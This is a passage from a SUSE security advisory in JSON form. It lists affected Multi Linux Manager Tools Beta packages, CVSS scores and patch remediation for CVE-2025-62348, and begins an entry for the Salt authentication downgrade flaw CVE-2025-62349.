"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-defusedxml-0.7.1-159000.4.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-mgr-push-5.2.3-159000.2.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-rhnlib-5.2.4-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-spacewalk-client-tools-5.2.4-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:spacecmd-5.2.6-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:spacewalk-client-tools-5.2.4-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:supportutils-plugin-salt-1.2.3-159000.4.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:supportutils-plugin-susemanager-client-5.2.2-159000.4.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:dracut-saltboot-1.1.0-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:dracut-wireless-0.1.1595937550.0285244-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-bash-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-lang-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-zsh-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-62348",
"url": "https://www.suse.com/security/cve/CVE-2025-62348"
},
{
"category": "external",
"summary": "SUSE Bug 1254256 for CVE-2025-62348",
"url": "https://bugzilla.suse.com/1254256"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Multi Linux Manager Tools Beta SLE-15:dracut-saltboot-1.1.0-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:dracut-wireless-0.1.1595937550.0285244-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgr-push-5.2.3-159000.2.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-bash-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-lang-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-zsh-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-defusedxml-0.7.1-159000.4.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-mgr-push-5.2.3-159000.2.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-rhnlib-5.2.4-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-spacewalk-client-tools-5.2.4-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:spacecmd-5.2.6-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:spacewalk-client-tools-5.2.4-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:supportutils-plugin-salt-1.2.3-159000.4.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:supportutils-plugin-susemanager-client-5.2.2-159000.4.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:dracut-saltboot-1.1.0-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:dracut-wireless-0.1.1595937550.0285244-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-bash-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-lang-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-zsh-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Multi Linux Manager Tools Beta SLE-15:dracut-saltboot-1.1.0-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:dracut-wireless-0.1.1595937550.0285244-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgr-push-5.2.3-159000.2.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-bash-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-lang-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-zsh-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-defusedxml-0.7.1-159000.4.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-mgr-push-5.2.3-159000.2.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-rhnlib-5.2.4-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-spacewalk-client-tools-5.2.4-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:spacecmd-5.2.6-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:spacewalk-client-tools-5.2.4-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:supportutils-plugin-salt-1.2.3-159000.4.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:supportutils-plugin-susemanager-client-5.2.2-159000.4.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:dracut-saltboot-1.1.0-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:dracut-wireless-0.1.1595937550.0285244-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-bash-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-lang-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-zsh-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-30T11:21:20Z",
"details": "important"
}
],
"title": "CVE-2025-62348"
},
{
"cve": "CVE-2025-62349",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-62349"
}
],
"notes": [
{
"category": "general",
"text": "Salt contains an authentication protocol version downgrade weakness that can allow a malicious minion to bypass newer authentication/security features by using an older request payload format, enabling minion impersonation and circumventing protections introduced in response to prior issues.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Multi Linux Manager Tools Beta SLE-15:dracut-saltboot-1.1.0-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:dracut-wireless-0.1.1595937550.0285244-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.ppc64le",
